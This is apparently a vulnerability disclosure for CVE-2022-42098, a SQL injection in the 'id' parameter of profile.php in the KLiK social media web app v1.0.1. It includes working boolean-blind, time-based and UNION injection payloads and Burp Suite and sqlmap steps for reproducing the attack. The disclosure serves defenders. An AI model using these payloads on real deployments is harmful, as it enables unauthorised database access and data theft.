Oct 31, 2022
1 min read
[CVE-2022–42098]KLiK SQL INJECTION
KLiK-SocialMediaWebsite version v1.0.1
Vulnerability Explanation:
KLiK-SocialMediaWebsite v1.0.1 has SQL Injection Vulnerabilities on profile.php at parameter id.
Attack Vectors:
KLiK-SocialMediaWebsite v1.0.1 Once an user has been created it can also be find people on KLiK through the KLiK Users page. The “id” parameter of the profile.php can be abused for injecting arbitrary SQL queries.
Affected:
- http://ip_address/KLiK/profile.php?id=user_id
- GET /KLiK/login.php
Payload :
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=27 AND 3227=3227 Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=27 AND (SELECT 3046 FROM (SELECT(SLEEP(5)))barN) Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: id=-2373 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71787a7171,0x6d67676474624545784f564265735871415865575a4f72697053686d724768624969514c70754459,0x717a707071),NULL,NULL,NULL,NULL,NULL,NULL#
Tested on:
- KLiK SocialMediaWebsite version v1.0.1 (https://github.com/msaad1999/KLiK-SocialMediaWebsite/releases/tag/v1.0.1)
- Firefox version 105
- sqlmap version 1.6.7 stable
Steps to attack:
- Login with username and password.
- Click the icon depicting a person in the upper right corner.
- Intercept request by using Burp Suite.
- Select an individual from the KLiK Users page by clicking on their name.
- Returning to Burp Suite, at /profile.php, right-click and select “Copy to file.”
- Send the request file to Kali Linux and use sqlmap with it.
- SQL Injection vulnerability discovered through id
Discoverer:
Grim The Ripper Team by SOSECURE Thailand
Disclosure Timeline:
- 2022–xx–xx: Vulnerability discovered.
- 2022–xx–xx: Vulnerability reported to the MITRE corporation.
- 2022–xx–xx: CVE has been reserved.
- 2022–xx–xx: Public disclosure of the vulnerability.
Reference:
